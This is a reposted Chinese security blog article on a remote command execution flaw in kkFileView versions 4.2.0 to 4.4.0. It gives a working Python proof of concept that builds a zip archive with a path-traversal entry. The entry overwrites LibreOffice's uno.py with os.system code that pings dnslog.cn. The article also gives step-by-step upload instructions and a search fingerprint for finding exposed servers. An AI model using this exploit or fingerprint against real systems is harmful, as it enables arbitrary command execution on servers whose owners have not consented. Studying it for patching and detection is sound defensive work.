kkfileview 任意命令执行漏洞

admin 2024年4月19日21:16:16评论8 views字数 882阅读2分56秒阅读模式

漏洞名称

kkfileview 任意命令执行漏洞

漏洞复现

1、创建python文件,将代码复制到文件中替换需要执行的命令

import zipfileif __name__ == "__main__":    try:        binary1 = b'test'        binary2 = b'import osrnos.system('ping dnslog.cn')'        zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)        info = zipfile.ZipInfo("test.zip")        zipFile.writestr("test", binary1)        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)        zipFile.close()    except IOError as e:        raise e

2、运行python代码后会生成test.zip文件

3、新建后缀名为odt的Libreoffice文档,输入任意内容

4、进入kkFileView首页

kkfileview 任意命令执行漏洞

5、上传本地文件预览处选择test.zip,上传成功后点击预览

6、回到页面中选择odt文件并上传,点击预览后,查看命令执行结果

总结:预览odt文件时,会将odt文件转换为pdf文件,在转换过程中调用了Libreoffice中的uno.py,因此,我们需要先利用任意文件写入漏洞,将执行命令的python代码追加到uno.py中,在点击预览odt文件时,即可完成命令执行操作

搜索指纹

title="kkfileview"

利用条件

4.2.0<= kkfileview <= 4.4.0

kkfileview 任意命令执行漏洞

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。

长按下方二维码,关注巨黑科,学习漏洞信息!

原文始发于微信公众号(道一安全):kkfileview 任意命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日21:16:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   kkfileview 任意命令执行漏洞http://cn-sec.com/archives/2671551.html

发表评论

匿名网友 填写信息